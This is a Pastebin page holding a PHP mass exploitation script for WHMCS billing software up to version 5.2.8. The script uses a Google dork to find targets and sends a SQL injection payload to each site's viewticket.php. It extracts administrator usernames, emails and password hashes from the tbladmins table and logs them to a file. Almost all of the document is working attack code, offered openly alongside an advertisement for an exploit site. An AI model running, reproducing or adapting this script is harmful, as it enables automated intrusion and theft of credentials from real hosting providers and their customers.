API tools faq
paste
Advertisement
jackwilder

WHMCS Auto Exploit by g00n

jackwilder
Jun 13th, 2015
1,050
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.58 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3. *****************************************************
  4.                 WHMCS 0day Auto Exploiter <= 5.2.8
  5.                 Coded by g00n - Skype: t3hg00n
  6.                         wwww.xploiter.net
  7. *****************************************************
  8. */
  9.  
  10. set_time_limit(0);
  11. ini_set('memory_limit', '64M');
  12. header('Content-Type: text/html; charset=UTF-8');
  13. function letItBy(){ ob_flush(); flush(); }
  14. function getAlexa($url)
  15. {
  16.         $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
  17.         $rank1 = $xml->SD[1];
  18.         if($rank1)
  19.                 $rank = $rank1->POPULARITY->attributes()->TEXT;
  20.         else
  21.                 $rank = 0;
  22.         return $rank;
  23. }
  24.        
  25. function google_that($query, $page=1)
  26. {
  27.         $resultPerPage=8;
  28.         $start = $page*$resultPerPage;
  29.         $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  30.         $resultFromGoogle = json_decode( http_get($url, true) ,true);
  31.         if(isset($resultFromGoogle['responseStatus'])) {
  32.                 if($resultFromGoogle['responseStatus'] != '200') return false;
  33.                 if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  34.                 else return $resultFromGoogle['responseData']['results'];
  35.         }
  36.         else
  37.                 die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  38. }
  39.        
  40. function http_get($url, $safemode = false){
  41.         if($safemode === true) sleep(1);
  42.         $im = curl_init($url);
  43.         curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  44.         curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  45.         curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  46.         curl_setopt($im, CURLOPT_HEADER, 0);
  47.         return curl_exec($im);
  48.         curl_close();
  49. }
  50.  
  51. function check_vuln($url) {
  52. $url = dirname($url) . '/viewticket.php';
  53. $url = str_replace("/admin","",$url);
  54.  
  55. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
  56. $curl_connection = curl_init($url);
  57. if($curl_connection != false) {
  58.         curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
  59.         curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  60.         curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
  61.         curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
  62.         curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
  63.         curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
  64.         $source = curl_exec($curl_connection);
  65.         preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
  66.         if($infoz[0]) {
  67.                 return $infoz[0];
  68.         }
  69.         else
  70.                 return "Fail!";
  71. }
  72. else
  73.         return "Fail!";
  74. }
  75. ?>
  76. <html>
  77. <head>
  78. <title>WHMCS Auto Xploiter - by g00n</title>
  79. </head>
  80. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  81.  
  82. <STYLE>
  83. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
  84. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
  85. body {
  86. font-family: Tahoma
  87. }
  88. tr {
  89. BORDER: dashed 1px #333;
  90. color: #FFF;
  91. }
  92. td {
  93. BORDER: dashed 1px #333;
  94. color: #FFF;
  95. }
  96. .table1 {
  97. BORDER: 0px Black;
  98. BACKGROUND-COLOR: Black;
  99. color: #FFF;
  100. }
  101. .td1 {
  102. BORDER: 0px;
  103. BORDER-COLOR: #333333;
  104. font: 7pt Verdana;
  105. color: Green;
  106. }
  107. .tr1 {
  108. BORDER: 0px;
  109. BORDER-COLOR: #333333;
  110. color: #FFF;
  111. }
  112. table {
  113. BORDER: dashed 1px #333;
  114. BORDER-COLOR: #333333;
  115. BACKGROUND-COLOR: Black;
  116. color: #FFF;
  117. }
  118. input {
  119. border                  : dashed 1px;
  120. border-color            : #333;
  121. BACKGROUND-COLOR: Black;
  122. font: 8pt Verdana;
  123. color: Red;
  124. }
  125. select {
  126. BORDER-RIGHT:  Black 1px solid;
  127. BORDER-TOP:    #DF0000 1px solid;
  128. BORDER-LEFT:   #DF0000 1px solid;
  129. BORDER-BOTTOM: Black 1px solid;
  130. BORDER-color: #FFF;
  131. BACKGROUND-COLOR: Black;
  132. font: 8pt Verdana;
  133. color: Red;
  134. }
  135. submit {
  136. BORDER:  buttonhighlight 2px outset;
  137. BACKGROUND-COLOR: Black;
  138. width: 30%;
  139. color: #FFF;
  140. }
  141. textarea {
  142. border                  : dashed 1px #333;
  143. BACKGROUND-COLOR: Black;
  144. font: Fixedsys bold;
  145. color: #999;
  146. }
  147. BODY {
  148.         SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  149. margin: 1px;
  150. color: Red;
  151. background-color: Black;
  152. }
  153. .main {
  154. margin                  : -287px 0px 0px -490px;
  155. BORDER: dashed 1px #333;
  156. BORDER-COLOR: #333333;
  157. }
  158. .tt {
  159. background-color: Black;
  160. }
  161.  
  162. A:link {
  163.         COLOR: White; TEXT-DECORATION: none
  164. }
  165. A:visited {
  166.         COLOR: White; TEXT-DECORATION: none
  167. }
  168. A:hover {
  169.         color: Red; TEXT-DECORATION: none
  170. }
  171. A:active {
  172.         color: Red; TEXT-DECORATION: none
  173. }
  174.  
  175. #result{margin:10px;}
  176. #result span{display:block;}
  177. #result .Y{background-color:green;}
  178. #result .X{background-color:red;}
  179. </STYLE>
  180. <script language=\'javascript\'>
  181. function hide_div(id)
  182. {
  183.   document.getElementById(id).style.display = \'none\';
  184.   document.cookie=id+\'=0;\';
  185. }
  186. function show_div(id)
  187. {
  188.   document.getElementById(id).style.display = \'block\';
  189.   document.cookie=id+\'=1;\';
  190. }
  191. function change_divst(id)
  192. {
  193.   if (document.getElementById(id).style.display == \'none\')
  194.     show_div(id);
  195.   else
  196.     hide_div(id);
  197. }
  198. </script>
  199. </td></table></tr>
  200. <br>
  201. <br>
  202. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  203.     <style>
  204.       body {
  205.         font-family: 'Audiowide', serif;
  206.         font-size: 30px;
  207.                
  208.       }
  209.     </style>
  210.   </head>
  211.  
  212.   <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  213.     <center>
  214. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
  215. <br>
  216. <font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
  217. </font>
  218. <br><br>
  219.  
  220. <table border=1 bordercolor=red>
  221. <tr>
  222. <td width="700">
  223. <br />
  224. <center>
  225.         <form method="post">
  226.                 Google Dork: &nbsp;&nbsp;
  227.                 <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
  228.                 &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
  229.         </form>
  230. <?php
  231.         if(isset($_POST['dork']{0})) {
  232.                 $file = fopen("WMCS-Hashes.txt","a");
  233.                 echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';                      
  234.                 letItBy();                    
  235.                 for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  236.                         $googleResult = google_that($_POST['dork'], $googlePage);
  237.                         if(!$googleResult) {
  238.                                 echo 'Finished scanning.';
  239.                                 fclose($file);
  240.                                 break;
  241.                         }
  242.                        
  243.                         for($victim = 0; $victim < sizeof($googleResult); $victim++){
  244.                                 $result = check_vuln($googleResult[$victim]['unescapedUrl']);
  245.                                 $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
  246.                                 if($result != "Fail!") {
  247.                                         $hashes = "";
  248.                                         foreach ($result as $record) {
  249.                                                 $hashes = $hashes . str_replace(':::::','',$record) . "\n";
  250.                                         }
  251.                                         $sep = "========================================================\n";
  252.                                         $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
  253.                                         fwrite($file,$data);
  254.                                         echo "<br /><font color=\"green\">Successfully Xploited...</font>";
  255.                                         echo '<span class="Y">';
  256.                                         echo "<pre>" . $data . "</pre></span><br />";
  257.                                        
  258.                                 }
  259.                                 else {
  260.                                 echo '<span class="X">';
  261.                                 echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
  262.                                 echo "</span>\n<br />";
  263.                                 }
  264.                                 letItBy();
  265.                         }
  266.                 }
  267.                 echo '</div>';
  268.         }
  269. ?>
  270. </center>
  271. </td>
  272. </table>
  273. <br /><br />
  274. <font face="Audiowide" color="red" size="2">
  275. Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
  276. <br > <font color="green">For more tools/scripts/exploits/etc.</font>
  277. <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
  278. </font>
  279.  
  280. </center>
  281. </body>
  282. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!